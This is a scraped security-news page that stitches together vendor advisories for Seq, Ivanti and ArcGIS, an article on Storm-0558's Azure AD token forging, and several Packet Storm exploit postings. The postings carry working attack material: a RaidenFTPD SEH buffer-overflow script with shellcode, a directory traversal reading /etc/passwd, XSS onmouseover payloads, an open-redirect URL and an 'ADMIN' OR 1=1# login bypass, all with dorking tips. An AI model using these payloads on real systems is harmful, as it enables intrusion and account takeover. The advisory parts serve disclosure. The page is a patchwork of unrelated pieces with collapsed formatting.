Categories: News
Tags: week in security

Tags:  malwarebytes

Tags:  July

Tags:  2023

A list of topics we covered in the week of July 17 to July 23 of 2023



(Read more...)




The post A week in security (July 17 - 23) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows Antivirus

Mac Antivirus

Android Antivirus

Free Antivirus

VPN App (All Devices)

Malwarebytes for iOS

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (July 17 - 23)

Datalust Seq before 2023.2.9489 allows insertion of sensitive information into an externally accessible file or directory. This is exploitable only when external (SQL Server or PostgreSQL) metadata storage is used. Exploitation can only occur from a high-privileged user account.

A vulnerability has been found affecting Seq instances that use external (SQL Server or PostgreSQL) metadata storage.

A high level of existing access/privilege is required in order to exploit the vulnerability (a level of infrastructure access normally held by administrative users is required).

Datalust advises that all Seq instances using SQL Server or PostgreSQL metadata storage should be updated to Seq 2023.2.9489 or later.

**Affected versions:** Seq versions prior to 2023.2.9489 using SQL Server or PostgreSQL metadata storage are affected.  
**Fix version:** 2023.2.9489.  
**CVE#:** CVE-2023-38195

**Detecting use of the SQL Server or PostgreSQL metadata store**

Seq normally uses a local filesystem-based store for configuration data. In some environments, SQL Server or PostgreSQL may be used instead. External metadata storage requires additional opt-in configuration as well as infrastructure provisioning.

The easiest way to confirm whether SQL Server or PostgreSQL is in use is to download a diagnostic report from _Settings > Diagnostics_ in the Seq UI, and look for either:

    Using SQL Metastore           : Yes
    

or

    Using PostgreSQL Metastore    : Yes
    

in the _Server Configuration_ section.

Otherwise, if a diagnostic report is not available, use of external metadata storage can be detected by the presence of a value in any of the following:

*   The metastore.postgres.connectionString or metastore.msSql.connectionString settings, accessed using either seq config get or seq secret get from an Administrative PowerShell prompt (Windows), or
*   The metastore.postgres.connectionString or metastore.msSql.connectionString settings, accessed using either seqsvr config get or seqsvr secret get from a shell prompt within the Docker container, or
*   The SEQ_METASTORE_POSTGRES_CONNECTIONSTRING or SEQ_METASTORE_MSSQL_CONNECTIONSTRING environment variables (Windows and Docker).

CVE-2023-38195: CVE-2023-38195 Security issue when using external (SQL Server or PostgreSQL) metadata storage · Issue #1886 · datalust/seq-tickets

An out-of-bounds write vulnerability on windows operating systems causes the Ivanti AntiVirus Product to crash. Update to Ivanti AV Product version 7.9.1.285 or above.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-35077: Ivanti Community


There is a Cross-site Scripting vulnerability in ArcGIS Server in versions 10.8.1 – 11.1 that may allow a remote, authenticated attacker to create a crafted link which onmouseover wont execute but could potentially render an image in the victims browser.  The privileges required to execute this attack are high.





**ArcGIS Server Security 2023 Update 1 Patch** is now available. This patch contains fixes for multiple medium priority security issues. Esri highly recommends customers using ArcGIS Server 11.1 through 10.8.1 to install this patch. Users at version 10.7.1 should upgrade to 10.9.1 or 11.1 and install this patch. ArcGIS 10.7.1 is in mature support status and no longer receives patches. Users working with ArcGIS Enterprise 10.7.1 and below are encouraged to upgrade to versions 11.1 (preferred), 10.9.1 or 10.8.1 and install available security patches.

This patch was released on June 28, 2023 and is available _here_.

We provide Common Vulnerability Scoring System v.3.1 (CVSS) scores to allow our customers to better assess risk of these vulnerabilities to their operations.  Both base and modified temporal scores are provided to reflect the availability of an official patch.

**Vulnerabilities fixed by this patch.**

1.  **BUG-000154070 Stored XSS issue in the ArcGIS REST Services directory**

*   CVE Details: CVE-2023-25840
*   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSSv3.1 Base Score: 5.4 (Moderate) CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/
*   CVSSv3.1 Environmentally Modified Score: 5.2 (Moderate) CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/RL:O

Description: There is a stored Cross-site Scripting vulnerability in Esri ArcGIS Server versions 10.8.1 – 11.0 on Windows and Linux platforms that may allow a remote, authenticated attacker to create crafted content which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser. The privileges required to execute this attack are low.

Mitigation: Disable the ArcGIS Server REST Services Directory.

1.  **BUG-000158075 – Stored XSS issue in ArcGIS Server**

*   CVE Details: CVE-2023-25841
*   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSSv3.1 Base Score: 6.1 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
*   CVSSv3.1 Environmentally Modified Score: 5.2 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/RL:O/MPR:L

Description: There is a stored Cross-site Scripting vulnerability in Esri ArcGIS Server versions 10.8.1 – 11.0 on Windows and Linux platforms that may allow a remote, unauthenticated attacker to create crafted content which when clicked could potentially execute arbitrary JavaScript code in the victim’s browser.

Mitigation: Disable anonymous access to ArcGIS Feature services with edit capabilities.

CVE-2023-25840: ArcGIS Server Security 2023 Update 1 Patch available!

The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought.
According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and

Email Security / Cyber Attack

The recent attack against Microsoft's email infrastructure by a Chinese nation-state actor referred to as Storm-0558 is said to have a broader scope than previously thought.

According to cloud security company Wiz, the inactive Microsoft account (MSA) consumer signing key used to forge Azure Active Directory (Azure AD or AAD) tokens to gain illicit access to Outlook Web Access (OWA) and Outlook.com could also have allowed the adversary to forge access tokens for various types of Azure AD applications.

This includes every application that supports personal account authentication, such as OneDrive, SharePoint, and Teams; customers applications that support the "Login with Microsoft functionality," and multi-tenant applications in certain conditions.

"Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Ami Luttwak, chief technology officer and co-founder of Wiz, said in a statement. "An attacker with an AAD signing key is the most powerful attacker you can imagine, because they can access almost any app – as any user. This is a 'shape shifter' superpower."

Microsoft, last week, disclosed the token forging technique was exploited by Storm-0558 to extract unclassified data from victim mailboxes, but the exact contours of the cyber espionage campaign remains unknown.

The Windows maker said it's still investigating as to how the adversary managed to acquire the MSA consumer signing key. But it's unclear if the key functioned as a master key of sorts to unlock access to data belonging to nearly two dozen organizations.

Wiz's analysis fills in some of the blanks, with the company discovering that "all Azure personal account v2.0 applications depend on a list of 8 public keys, and all Azure multi-tenant v2.0 applications with Microsoft account enabled depend on a list of 7 public keys."

It further found that Microsoft replaced one of the the listed public keys (thumbprint: "d4b4cccda9228624656bff33d8110955779632aa") that had been present since at least 2016 sometime between June 27, 2023, and July 5, 2023, around the same period the company said it had revoked the MSA key.

"This led us to believe that although the compromised key acquired by Storm-0558 was a private key designed for Microsoft's MSA tenant in Azure, it was also able to sign OpenID v2.0 tokens for multiple types of Azure Active Directory applications," Wiz said.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

"Storm-0558 seemingly managed to obtain access to one of several keys that were intended for signing and verifying AAD access tokens. The compromised key was trusted to sign any OpenID v2.0 access token for personal accounts and mixed-audience (multi-tenant or personal account) AAD applications."

This effectively means that it could theoretically enable malicious actors to forge access tokens for consumption by any application that depends on the Azure identity platform.

Even worse, the acquired private key could have been weaponized to forge tokens to authenticate as any user to an affected application that trusts Microsoft OpenID v2.0 mixed audience and personal-accounts certificates.

"Identity provider's signing keys are probably the most powerful secrets in the modern world," Wiz security researcher Shir Tamari said. "With identity provider keys, one can gain immediate single hop access to everything, any email box, file service, or cloud account."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Azure AD Token Forging Technique in Microsoft Attack Extends Beyond Outlook, Wiz Reports

WordPress Page Builder KingComposer plugin version 2.9.5 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.5 Open Redirect Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.9.5 Open Redirection

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS-Bank Mellat Payment Manager version 1.0.0 suffers from a cross site scripting vulnerability.

====================================================================================================================================  
| # Title     : CMS-Bank Mellat Payment Manager v1.0.0 Xss Vulnerability                                                           |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.2 (64 bits)                                          |   
| # Vendor    : https://github.com/                                                                                                |    
| # Dork      :                                                                                                                    |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine. 

[+] Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
   (usually in the form of Javascript) to another user.   
    Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context   
  allowing the attacker to access any cookies or session tokens retained by the browser. 

  [+] Affected items : 

    /bank/default.php   
   /bank/index.php 

   [+] The impact of this vulnerability :

   Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data   
   from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify   
   the content of the page presented to the user. 

[+] How to fix this vulnerability :

   Your script should filter metacharacters from user input.  
   Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code   
   (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not,  
   it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. 

[+] Attack details :

    URL encoded POST input PayAdditionalData was set to 01/01/1967" onmouseover=prompt(940051) bad="  
    The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input PayAmount was set to 1" onmouseover=prompt(911818) bad="  
   The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input pay_from was set to 1" onmouseover=prompt(965239) bad="  
   The input is reflected inside a tag parameter between double quotes.

   URL encoded POST input pay_from1 was set to 1" onmouseover=prompt(951829) bad="  
   The input is reflected inside a tag parameter between double quotes.

   Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |          
=======================================================================================================================================

CMS-Bank Mellat Payment Manager 1.0.0 Cross Site Scripting

RaidenFTPD version 2.4.4005 suffers from a buffer overflow vulnerability.

    # Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)# Date: 18/07/2023# Exploit Author: Andre Nogueira# Vendor Homepage: https://www.raidenftpd.com/en/# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe# Version: RaidenFTPD 2.4.4005# Tested on: Microsoft Windows 10 Build 19045# 1.- Open RaidenFTPD# 2.- Click on 'Setup' -> 'Step by step setup wizard'# 3.- Run python code: exploit-raidenftpd.py# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'# 5.- Click 'next' -> 'next' -> 'ok'# 6.- Pop calc.exe#!/usr/bin/env python3from struct import packcrash = 2000offset = 497# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "\x00\x0d" shellcode =  b"\x90" * 8shellcode += b"\xb8\x9c\x78\x14\x60\xd9\xc2\xd9\x74\x24\xf4"shellcode += b"\x5a\x33\xc9\xb1\x31\x83\xea\xfc\x31\x42\x0f"shellcode += b"\x03\x42\x93\x9a\xe1\x9c\x43\xd8\x0a\x5d\x93"shellcode += b"\xbd\x83\xb8\xa2\xfd\xf0\xc9\x94\xcd\x73\x9f"shellcode += b"\x18\xa5\xd6\x34\xab\xcb\xfe\x3b\x1c\x61\xd9"shellcode += b"\x72\x9d\xda\x19\x14\x1d\x21\x4e\xf6\x1c\xea"shellcode += b"\x83\xf7\x59\x17\x69\xa5\x32\x53\xdc\x5a\x37"shellcode += b"\x29\xdd\xd1\x0b\xbf\x65\x05\xdb\xbe\x44\x98"shellcode += b"\x50\x99\x46\x1a\xb5\x91\xce\x04\xda\x9c\x99"shellcode += b"\xbf\x28\x6a\x18\x16\x61\x93\xb7\x57\x4e\x66"shellcode += b"\xc9\x90\x68\x99\xbc\xe8\x8b\x24\xc7\x2e\xf6"shellcode += b"\xf2\x42\xb5\x50\x70\xf4\x11\x61\x55\x63\xd1"shellcode += b"\x6d\x12\xe7\xbd\x71\xa5\x24\xb6\x8d\x2e\xcb"shellcode += b"\x19\x04\x74\xe8\xbd\x4d\x2e\x91\xe4\x2b\x81"shellcode += b"\xae\xf7\x94\x7e\x0b\x73\x38\x6a\x26\xde\x56"shellcode += b"\x6d\xb4\x64\x14\x6d\xc6\x66\x08\x06\xf7\xed"shellcode += b"\xc7\x51\x08\x24\xac\xae\x42\x65\x84\x26\x0b"shellcode += b"\xff\x95\x2a\xac\xd5\xd9\x52\x2f\xdc\xa1\xa0"shellcode += b"\x2f\x95\xa4\xed\xf7\x45\xd4\x7e\x92\x69\x4b"shellcode += b"\x7e\xb7\x09\x0a\xec\x5b\xe0\xa9\x94\xfe\xfc"nSEH = b"\xeb\x06\x90\x90" # short jump of 8 bytesSEH = pack("<L", 0x7c1e76ff) #  pop eax; pop esi; ret; => msvcp70.dllbuffer = b"A" * offsetbuffer += nSEHbuffer += SEHbuffer += shellcodebuffer += b"D" * (crash -len(buffer))file_payload = open("exploit-raiden.txt", 'wb')print("[*] Creating the .txt file for out payload")file_payload.write(buffer)print("[*] Writing malicious payload to the .txt file")file_payload.close()

RaidenFTPD 2.4.4005 Buffer Overflow

CMS TSS-EST version 1.0.0 from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : CMS TSS-EST V1.0.0 auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://p30vel.ir/                                                                                                 || # Dork      : Powered by: TSS-EST.COM                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use Payload :  user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/tishreen-uhledusy/cms/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows